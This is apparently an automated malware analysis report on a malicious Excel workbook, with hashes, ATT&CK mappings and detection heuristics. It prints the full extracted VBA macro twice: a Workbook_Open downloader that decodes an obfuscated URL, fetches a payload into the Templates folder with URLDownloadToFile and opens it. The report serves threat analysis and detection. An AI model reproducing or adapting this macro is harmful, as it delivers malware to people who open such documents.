Office (OLE) malware analysis — malicious · 5bd48c2f61541124

MALICIOUS

Office (OLE)

41.5 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2020-08-25

MD5: 5a055d79469fdc7d6966d4f8834a7bf3 SHA-1: d90d93db5ce05c99231a8ed93b5520f3e38b433a SHA-256: 5bd48c2f61541124920d71e674ce3fd5927702f69c2baacc5a509debe3a893c8

388 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1059 Command and Scripting Interpreter

The sample contains VBA macros that utilize WScript.Shell and URLDownloadToFile to download and execute a payload. The Workbook_Open subroutine is triggered upon opening the document, indicating an automated execution flow. The script attempts to construct a URL and save it to the 'Templates' folder, strongly suggesting it acts as a downloader for further malicious activity.

Heuristics 9

ClamAV: Xls.Dropper.Agent-9310609-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-9310609-0
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

Set euelis = CreateObject("WScript.Shell")
itelro = euelis.SpecialFolders("Templates")

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA
Matched line in script
```
DeleteUrlCacheEntry (zzz)
URLDownloadToFile 0, zzz, eee, 0, 0
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set euelis = CreateObject("WScript.Shell")
itelro = euelis.SpecialFolders("Templates")

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
Dim euelis As Object
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4328 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4328 bytes
SHA-256: `a56a21ce48f4d72232cb3906936e496e5831347e200144cf9f0e574c6e364691`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Declare PtrSafe Function DeleteUrlCacheEntry Lib "Wininet.dll" Alias _ "DeleteUrlCacheEntryA" (ByVal lpszUrlName As String) As Long Sub Workbook_Open() Dim euelis As Object Dim itelro As String Set euelis = CreateObject("WScript.Shell") itelro = euelis.SpecialFolders("Templates") Dim bbb Dim ccc Dim ddd Dim eee Dim fff Dim ggg As Integer Dim hhh Dim iii ggg = 1 Set hhh = CreateObject("microsoft.xmlhttp") Dim dfefef dfefef = Chr(585648 / CLng(&H1B90)) & Chr(602784 / CLng(&H16A4)) & Chr(305020 / CLng(&HBCC)) & Chr(15228 / CLng(&H8D)) & Chr(879768 / CLng(&H1FD2)) & Chr(20930 / CLng(&H1C7)) & Chr(560755 / CLng(&H21B3)) & Chr(418432 / CLng(&HE98)) & Chr(-8603 + CLng(&H220B)) & Chr(1025676 / CLng(&H2519)) & Chr(551250 / CLng(&H1482)) & Chr(53064 / CLng(&H218)) & Chr(454736 / CLng(&H1250)) & Chr(722448 / CLng(&H1854)) & Chr(277095 / CLng(&HA4F)) & Chr(921189 / CLng(&H206B)) & Chr(648230 / CLng(&H1705)) Set fff = CreateObject(dfefef) eee = itelro & Chr(649152 / CLng(&H1B90)) & Chr(666540 / CLng(&H16A4)) & Chr(338240 / CLng(&HBCC)) & Chr(15651 / CLng(&H8D)) & Chr(879768 / CLng(&H1FD2)) & Chr(52325 / CLng(&H1C7)) & Chr(1017986 / CLng(&H21B3)) & Chr(377336 / CLng(&HE98)) & Chr(-8669 + CLng(&H220B)) & Chr(959197 / CLng(&H2519)) & Chr(630000 / CLng(&H1482)) & Chr(54136 / CLng(&H218)) zzz = Chr(733824 / CLng(&H1B90)) & Chr(672336 / CLng(&H16A4)) & Chr(350320 / CLng(&HBCC)) & Chr(15792 / CLng(&H8D)) & Chr(936790 / CLng(&H1FD2)) & Chr(26390 / CLng(&H1C7)) & Chr(405469 / CLng(&H21B3)) & Chr(175592 / CLng(&HE98)) & Chr(-8613 + CLng(&H220B)) & Chr(949700 / CLng(&H2519)) & Chr(236250 / CLng(&H1482)) & Chr(53064 / CLng(&H218)) & Chr(520368 / CLng(&H1250)) & Chr(678852 / CLng(&H1854)) & Chr(121394 / CLng(&HA4F)) zzz = zzz & Chr(846498 / CLng(&H206B)) & Chr(671802 / CLng(&H1705)) & Chr(-9064 + CLng(&H2397)) & Chr(827288 / CLng(&H1B28)) & Chr(273280 / CLng(&H988)) & Chr(47925 / CLng(&H429)) & Chr(-6664 + CLng(&H1A6B)) & Chr(-5642 + CLng(&H1679)) & Chr(113410 / CLng(&H407)) & Chr(-2730 + CLng(&HB1E)) & Chr(298859 / CLng(&HB8F)) & Chr(331210 / CLng(&HBC3)) & Chr(1136684 / CLng(&H2647)) & Chr(-2737 + CLng(&HAE0)) & Chr(188964 / CLng(&H65D)) & Chr(426608 / CLng(&H1006)) zzz = zzz & Chr(719928 / CLng(&H1BD8)) & Chr(-6224 + CLng(&H18BD)) & Chr(187961 / CLng(&H745)) & Chr(92920 / CLng(&H328)) & Chr(425726 / CLng(&H2362)) & Chr(777447 / CLng(&H1EAD)) & Chr(321678 / CLng(&HB52)) & Chr(694980 / CLng(&H18AE)) & Chr(-4171 + CLng(&H10BE)) & Chr(656487 / CLng(&H15EB)) & Chr(986904 / CLng(&H23B2)) & Chr(26332 / CLng(&HE3)) & Chr(962115 / CLng(&H23CB)) & Chr(745800 / CLng(&H1A7C)) & Chr(529214 / CLng(&H1412)) zzz = zzz & Chr(406640 / CLng(&HDD0)) & Chr(-2597 + CLng(&HA8A)) & Chr(278046 / CLng(&H987)) & Chr(71980 / CLng(&H262)) & Chr(383355 / CLng(&HE43)) & Chr(154242 / CLng(&H616)) & Chr(259974 / CLng(&HA0E)) & Chr(-5307 + CLng(&H152E)) & Chr(441142 / CLng(&H24AA)) & Chr(592254 / CLng(&H13C6)) & Chr(120400 / CLng(&H433)) & Chr(496476 / CLng(&H11F5)) & Chr(661782 / CLng(&H174A)) & Chr(-92 + CLng(&HBD)) & Chr(-641 + CLng(&H2E5)) zzz = zzz & Chr(-3271 + CLng(&HCF6)) & Chr(348 / CLng(&H3)) & Chr(716348 / CLng(&H19AC)) & Chr(-8163 + CLng(&H2053)) & Chr(88320 / CLng(&H780)) & Chr(526988 / CLng(&H11BF)) & Chr(180120 / CLng(&H5DD)) & Chr(1077524 / CLng(&H2449)) DeleteUrlCacheEntry (zzz) URLDownloadToFile 0, zzz, eee, 0, 0 fff.Open (eee) End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" Option Explicit Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _ (ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _ ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr) As Long

SHA-256: a56a21ce48f4d72232cb3906936e496e5831347e200144cf9f0e574c6e364691

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Declare PtrSafe Function DeleteUrlCacheEntry Lib "Wininet.dll" Alias _
"DeleteUrlCacheEntryA" (ByVal lpszUrlName As String) As Long


Sub Workbook_Open()
Dim euelis As Object
Dim itelro As String

Set euelis = CreateObject("WScript.Shell")
itelro = euelis.SpecialFolders("Templates")
Dim bbb
Dim ccc
Dim ddd
Dim eee
Dim fff
Dim ggg As Integer
Dim hhh
Dim iii
ggg = 1


Set hhh = CreateObject("microsoft.xmlhttp")
Dim dfefef
dfefef = Chr(585648 / CLng(&H1B90)) & Chr(602784 / CLng(&H16A4)) & Chr(305020 / CLng(&HBCC)) & Chr(15228 / CLng(&H8D)) & Chr(879768 / CLng(&H1FD2)) & Chr(20930 / CLng(&H1C7)) & Chr(560755 / CLng(&H21B3)) & Chr(418432 / CLng(&HE98)) & Chr(-8603 + CLng(&H220B)) & Chr(1025676 / CLng(&H2519)) & Chr(551250 / CLng(&H1482)) & Chr(53064 / CLng(&H218)) & Chr(454736 / CLng(&H1250)) & Chr(722448 / CLng(&H1854)) & Chr(277095 / CLng(&HA4F)) & Chr(921189 / CLng(&H206B)) & Chr(648230 / CLng(&H1705))
Set fff = CreateObject(dfefef)
eee = itelro & Chr(649152 / CLng(&H1B90)) & Chr(666540 / CLng(&H16A4)) & Chr(338240 / CLng(&HBCC)) & Chr(15651 / CLng(&H8D)) & Chr(879768 / CLng(&H1FD2)) & Chr(52325 / CLng(&H1C7)) & Chr(1017986 / CLng(&H21B3)) & Chr(377336 / CLng(&HE98)) & Chr(-8669 + CLng(&H220B)) & Chr(959197 / CLng(&H2519)) & Chr(630000 / CLng(&H1482)) & Chr(54136 / CLng(&H218))
zzz = Chr(733824 / CLng(&H1B90)) & Chr(672336 / CLng(&H16A4)) & Chr(350320 / CLng(&HBCC)) & Chr(15792 / CLng(&H8D)) & Chr(936790 / CLng(&H1FD2)) & Chr(26390 / CLng(&H1C7)) & Chr(405469 / CLng(&H21B3)) & Chr(175592 / CLng(&HE98)) & Chr(-8613 + CLng(&H220B)) & Chr(949700 / CLng(&H2519)) & Chr(236250 / CLng(&H1482)) & Chr(53064 / CLng(&H218)) & Chr(520368 / CLng(&H1250)) & Chr(678852 / CLng(&H1854)) & Chr(121394 / CLng(&HA4F))

zzz = zzz & Chr(846498 / CLng(&H206B)) & Chr(671802 / CLng(&H1705)) & Chr(-9064 + CLng(&H2397)) & Chr(827288 / CLng(&H1B28)) & Chr(273280 / CLng(&H988)) & Chr(47925 / CLng(&H429)) & Chr(-6664 + CLng(&H1A6B)) & Chr(-5642 + CLng(&H1679)) & Chr(113410 / CLng(&H407)) & Chr(-2730 + CLng(&HB1E)) & Chr(298859 / CLng(&HB8F)) & Chr(331210 / CLng(&HBC3)) & Chr(1136684 / CLng(&H2647)) & Chr(-2737 + CLng(&HAE0)) & Chr(188964 / CLng(&H65D)) & Chr(426608 / CLng(&H1006))
zzz = zzz & Chr(719928 / CLng(&H1BD8)) & Chr(-6224 + CLng(&H18BD)) & Chr(187961 / CLng(&H745)) & Chr(92920 / CLng(&H328)) & Chr(425726 / CLng(&H2362)) & Chr(777447 / CLng(&H1EAD)) & Chr(321678 / CLng(&HB52)) & Chr(694980 / CLng(&H18AE)) & Chr(-4171 + CLng(&H10BE)) & Chr(656487 / CLng(&H15EB)) & Chr(986904 / CLng(&H23B2)) & Chr(26332 / CLng(&HE3)) & Chr(962115 / CLng(&H23CB)) & Chr(745800 / CLng(&H1A7C)) & Chr(529214 / CLng(&H1412))
zzz = zzz & Chr(406640 / CLng(&HDD0)) & Chr(-2597 + CLng(&HA8A)) & Chr(278046 / CLng(&H987)) & Chr(71980 / CLng(&H262)) & Chr(383355 / CLng(&HE43)) & Chr(154242 / CLng(&H616)) & Chr(259974 / CLng(&HA0E)) & Chr(-5307 + CLng(&H152E)) & Chr(441142 / CLng(&H24AA)) & Chr(592254 / CLng(&H13C6)) & Chr(120400 / CLng(&H433)) & Chr(496476 / CLng(&H11F5)) & Chr(661782 / CLng(&H174A)) & Chr(-92 + CLng(&HBD)) & Chr(-641 + CLng(&H2E5))
zzz = zzz & Chr(-3271 + CLng(&HCF6)) & Chr(348 / CLng(&H3)) & Chr(716348 / CLng(&H19AC)) & Chr(-8163 + CLng(&H2053)) & Chr(88320 / CLng(&H780)) & Chr(526988 / CLng(&H11BF)) & Chr(180120 / CLng(&H5DD)) & Chr(1077524 / CLng(&H2449))
DeleteUrlCacheEntry (zzz)
URLDownloadToFile 0, zzz, eee, 0, 0

fff.Open (eee)
End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Option Explicit

    Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _
    ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr) As Long

Open this report in the interactive analyzer, or submit your own file for analysis.